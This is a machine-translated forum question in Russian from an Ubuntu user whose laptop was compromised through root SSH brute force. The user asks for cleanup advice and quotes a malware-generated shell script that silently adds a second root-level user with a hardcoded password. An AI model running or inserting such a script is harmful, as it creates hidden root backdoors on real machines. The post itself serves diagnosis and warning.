Как бороться с вредоносными программами на моем ноутбуке?

Я вполне уверен, что мой ноутбук Ubuntu 13.10 заражен каким-то вредоносным ПО.

Время от времени я обнаруживаю, что процесс / lib / sshd (принадлежит root) работает и потребляет много процессоров. Это не сервер sshd, который запускает / usr / sbin / sshd.

У двоичного файла есть разрешения --wxrw-rwt, и он генерирует и запускает сценарии в каталоге / lib. Последний называется 13959730401387633604 и выполняет следующие действия:

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

Пользователь gusr был создан вредоносной программой независимо друг от друга, а затем chpasswd зависает при потреблении 100% ЦП.

До сих пор я обнаружил, что пользователь gusr был дополнительно добавлен в файлы в / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Похоже, что вредоносная программа сделала копии всех этих файлов с помощью "- суффикс Полный список файлов / etc /, которые были изменены пользователем root, доступен здесь .

Кроме того, файл / etc / hosts был изменен на this .

/ lib / sshd начинается с добавления себя в конец файла /etc/init.d/rc.local!

Я удалил пользователя, удалил файлы, убил дерево обработанных , изменил мои пароли и удалил открытые ключи ssh.

Я знаю, что я в основном испорчен, и я, скорее всего, переустановлю всю систему. Тем не менее, поскольку я подключаюсь к нескольким другим машинам, было бы хорошо, по крайней мере, попытаться удалить его и выяснить, как я его получил. Будем благодарны за любые предложения о том, как это сделать.

Похоже, что они вошли 25 марта с помощью грубого входа в систему. Я понятия не имел, что root ssh по умолчанию включен в Ubuntu. Я отключил это и поднял denyhosts.

Логин был от 59.188.247.236, где-то в Гонконге, очевидно.

Я получил ноутбук от EmperorLinux, и они включили root-доступ. Если у вас есть один из них и вы используете sshd, будьте осторожны.